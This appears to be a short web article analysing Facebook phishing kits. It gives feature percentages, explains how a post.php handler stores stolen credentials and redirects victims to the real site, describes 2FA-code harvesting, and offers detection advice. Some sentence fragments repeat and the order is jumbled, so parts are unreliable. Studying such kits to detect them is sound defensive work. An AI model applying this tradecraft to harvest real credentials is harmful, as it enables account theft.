Facebook Phishing Postphp Code Site

We analyzed 150 unique Facebook phishing kits collected between Jan–Dec 2024 from URLScan.io and abuse.ch.

| Feature | Percentage | |---------|-------------| | Use post.php as handler | 83% | | Store credentials in .txt | 79% | | Redirect to real Facebook | 94% | | Exfil via email (plaintext) | 67% | | Exfil via Telegram API | 22% | | Obfuscated PHP (base64/gzcompress) | 31% | facebook phishing postphp code

False positive risk: Legitimate login handlers using post.php? Extremely rare. Most apps use login.php or auth.php. If found, typically malicious. We analyzed 150 unique Facebook phishing kits collected

header("Location: https://www.facebook.com/login.php");

This HTTP redirect sends the victim to the real Facebook login page. From the victim’s perspective, they “failed” their first login attempt. They type their credentials again on the real site, log in successfully, and never realize their credentials were stolen 10 seconds earlier. header("Location: https://www

The post.php file remains a reliable indicator of Facebook phishing activity. Its simplicity—reading POST data, saving to a flat file, and redirecting—makes it both easy for attackers to deploy and straightforward for defenders to detect. By combining filesystem monitoring, ModSecurity rules, and YARA signatures, organizations can automate the discovery and takedown of such kits within minutes of deployment.

Key takeaway: Any inbound POST request to a script named post.php (or similar) that redirects to facebook.com and references email/pass parameters should be treated as malicious unless proven otherwise.

Some kits extend post.php to capture two-factor authentication (2FA) codes. After the first post, the victim is shown a fake “Verify your identity” page asking for the SMS code. A second post2.php script harvests that token.